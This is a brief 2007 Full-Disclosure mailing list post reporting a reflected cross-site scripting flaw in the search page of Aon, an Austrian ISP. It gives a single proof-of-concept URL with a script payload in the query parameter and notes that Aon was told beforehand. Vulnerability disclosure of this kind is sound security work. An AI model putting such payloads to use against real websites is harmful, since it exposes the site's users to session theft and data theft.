[Full-disclosure] XSS at Aon.at, Austrian ISP

Florian Stinglmayr fstinglmayr at gmail.com
Tue Mar 13 07:09:01 GMT 2007


Here we go:

http://jawe.aon.at/search/aon.sp?query=<script>alert(1);</script>

The issue has been reported to AON before.

Regards,
Florian Stinglmayr




Full-Disclosure is hosted and sponsored by Secunia.